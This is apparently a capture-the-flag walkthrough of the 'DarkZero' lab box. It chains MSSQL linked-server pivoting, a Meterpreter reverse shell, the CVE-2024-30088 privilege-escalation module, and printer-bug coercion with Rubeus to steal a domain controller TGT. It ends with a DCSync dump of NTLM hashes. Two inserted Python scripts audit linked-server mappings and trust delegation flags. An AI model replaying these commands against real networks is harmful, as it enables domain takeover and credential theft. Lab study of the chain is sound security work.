DarkZero

As is common in real-life pentests, you will start the DarkZero box with credentials for the following account: john.w / RFulUtONCOL!

User

We use MSSQL linked servers to pivot from DC01.darkzero.htb to DC02.darkzero.ext: john.w is only a guest on DC01, but the link to DC02 maps that login to the fixed remote login dc01_sql_svc.

impacket-mssqlclient john.w@DC01.darkzero.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------   
DC01                SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL      

DC02.darkzero.ext   SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL      

Linked Server       Local Login       Is Self Mapping   Remote Login   
-----------------   ---------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w                 0   dc01_sql_svc   
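As an added example (not part of the original write-up), the following Python script parses the enum_links login-mapping table and flags the links where a local login is switched to a fixed remote account, the configuration that makes this pivot possible; the sample rows are constructed, the first copying the output above.

```python
"""Audit MSSQL linked-server login mappings for identity hops.

Added example, not from the original write-up: parses the login-mapping table
that impacket-mssqlclient's enum_links prints (sp_helplinkedsrvlogin output)
and flags links where a local login is switched to a fixed remote login, which
is the hop from guest john.w on DC01 to dc01_sql_svc on DC02 shown above.
The sample rows are constructed; the first copies the write-up's output.
"""
import re
from dataclasses import dataclass

# Constructed sample in the enum_links layout (rows 2 and 3 added for contrast).
SAMPLE = """\
Linked Server       Local Login       Is Self Mapping   Remote Login
-----------------   ---------------   ---------------   ------------
DC02.darkzero.ext   darkzero\\john.w                 0   dc01_sql_svc
DC03.darkzero.ext   NULL                            1   NULL
DC04.darkzero.ext   NULL                            0   sa
"""

@dataclass
class LinkLogin:
    server: str
    local_login: str    # "NULL" means the mapping applies to every local login
    self_mapping: bool  # True: the caller's own identity is used on the remote
    remote_login: str   # fixed remote login; "NULL" without self-mapping = no context

def parse_link_logins(text):
    """Turn the fixed-width table into LinkLogin rows (columns are 2+ spaces apart)."""
    rows = []
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) != 4 or parts[2] not in ("0", "1"):
            continue  # header, separator or blank line
        rows.append(LinkLogin(parts[0], parts[1], parts[2] == "1", parts[3]))
    return rows

def find_identity_hops(rows):
    """Return (server, local_scope, remote_login) for mappings that change identity.

    Self-mapping links forward the caller's own credentials and are not flagged;
    a fixed remote login lets every matching local login act as that account.
    """
    hops = []
    for r in rows:
        if r.self_mapping:
            continue
        scope = "<all logins>" if r.local_login == "NULL" else r.local_login
        hops.append((r.server, scope, r.remote_login))
    return hops
```

When reviewing such findings, self-mapping (impersonation) or a least-privilege remote login is the setting to compare against.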

Using a Meterpreter payload generated with revshells.com, we get a Metasploit session on DC02.

Running Metasploit's local exploit suggester against that session lists candidate Windows privilege-escalation modules; the CVE-2024-30088 module gives us a SYSTEM shell on DC02:

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.20:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 6176...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 608
[+] Successfully retrieved winlogon pid: 612
[*] Sending stage (203846 bytes) to 10.10.11.89
[*] Meterpreter session 3 opened (10.10.16.20:4444 -> 10.10.11.89:60473) at 2025-10-06 05:53:58 +0800

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::

Root

Enumerating trust relationships with powerview.py, we see the following trust attributes:

╭─LDAPS─[DC01.darkzero.htb]─[darkzero-ext\Administrator]-[NS:<auto>] [CACHED]
╰─PV ❯ Get-NetTrust
objectClass                   : top
                                leaf
                                trustedDomain
whenCreated                   : 29/07/2025 15:30:19 (2 months, 6 days ago)
whenChanged                   : 29/09/2025 18:25:18 (6 days ago)
name                          : darkzero.ext
objectGUID                    : {dc96b90d-8181-4c7f-90df-54b9814a8c06}
securityIdentifier            : S-1-5-21-1969715525-31638512-2552845157
trustDirection                : INBOUND
                                OUTBOUND
                                BIDIRECTIONAL
trustPartner                  : darkzero.ext
trustType                     : WINDOWS_ACTIVE_DIRECTORY
                                MIT
trustAttributes               : FOREST_TRANSITIVE
                                CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION
flatName                      : darkzero-ext
msDS-TrustForestTrustInfo     : S-1-5-21-1969715525-31638512-2552845157

The CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION attribute is set on the trust, so TGTs from darkzero.htb may be forwarded across it. With Rubeus monitoring on DC02 for incoming TGTs, we coerce DC01 to authenticate to DC02 and capture the DC01$ TGT:
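As an added example (not from the write-up or from powerview.py), this script decodes the raw trustAttributes and trustDirection integers behind that output using the flag values from MS-ADTS 6.1.6.7.9 and reports the trusts that explicitly enable cross-forest TGT delegation; the records are constructed, with the first matching the darkzero.ext trust.

```python
"""Decode trustAttributes / trustDirection and flag TGT-delegating trusts.

Added example, not from the write-up or powerview.py. Bit values follow
MS-ADTS 6.1.6.7.9; the sample records are constructed and the first one
mirrors the darkzero.ext trust object shown above (0x808 = 2056).
"""
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL",
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}
TRUST_DIRECTION = {0: "DISABLED", 1: "INBOUND", 2: "OUTBOUND", 3: "BIDIRECTIONAL"}

# Constructed records: (trustPartner, trustAttributes, trustDirection).
SAMPLE_TRUSTS = [
    ("darkzero.ext", 0x808, 3),      # forest trust, TGT delegation enabled
    ("partner.example", 0x208, 3),   # forest trust, TGT delegation disabled
    ("legacy.example", 0x044, 1),    # quarantined external trust, neither bit
]

def decode_attributes(value):
    """Names of the bits set in a trustAttributes integer, lowest bit first."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]

def tgt_delegation_state(value):
    """'enabled' or 'disabled' when the trust says so explicitly, else 'default'
    (updated DCs treat the unset case as no delegation, see KB4490425)."""
    if value & 0x0800:
        return "enabled"
    if value & 0x0200:
        return "disabled"
    return "default"

def audit_trusts(trusts):
    """Return (partner, direction, flags) for trusts that explicitly enable TGT
    delegation: a TGT from this forest can then be forwarded to an
    unconstrained-delegation host in the partner forest, as the write-up shows.
    Remediation per KB4490425: netdom trust <trusting> /domain:<trusted>
    /EnableTgtDelegation:No"""
    return [(p, TRUST_DIRECTION.get(d, "UNKNOWN"), decode_attributes(a))
            for p, a, d in trusts if tgt_delegation_state(a) == "enabled"]
```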

PS C:\Users\Public> ./r.exe monitor /interval:5 /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
<snip>
[*] 10/5/2025 11:25:25 PM UTC - Found new TGT:

  User                  :  DC01$@DARKZERO.HTB
  StartTime             :  10/5/2025 2:06:22 PM
  EndTime               :  10/6/2025 12:06:20 AM
  RenewTill             :  10/12/2025 2:06:20 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    <snip>

[*] Ticket cache size: 9

## On another Terminal
./SpoolSample.exe DC01.darkzero.htb DC02.darkzero.ext

We then use impacket-ticketConverter to convert the captured .kirbi ticket into a .ccache that the Impacket tools can use:

echo "<snip>" | base64 -d > dc01.kirbi
 
impacket-ticketConverter dc01.kirbi dc01.ccache    
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done


impacket-secretsdump 'DC01$'@DC01.darkzero.htb -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::
[*] Kerberos keys grabbed
[*] Cleaning up... 

Finally, evil-winrm as Administrator on DC01 to collect the flags:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         10/5/2025   2:06 PM             34 root.txt
-ar---         10/5/2025   2:06 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type *
ca2f5f1a32<snip>
82db32d8<snip>
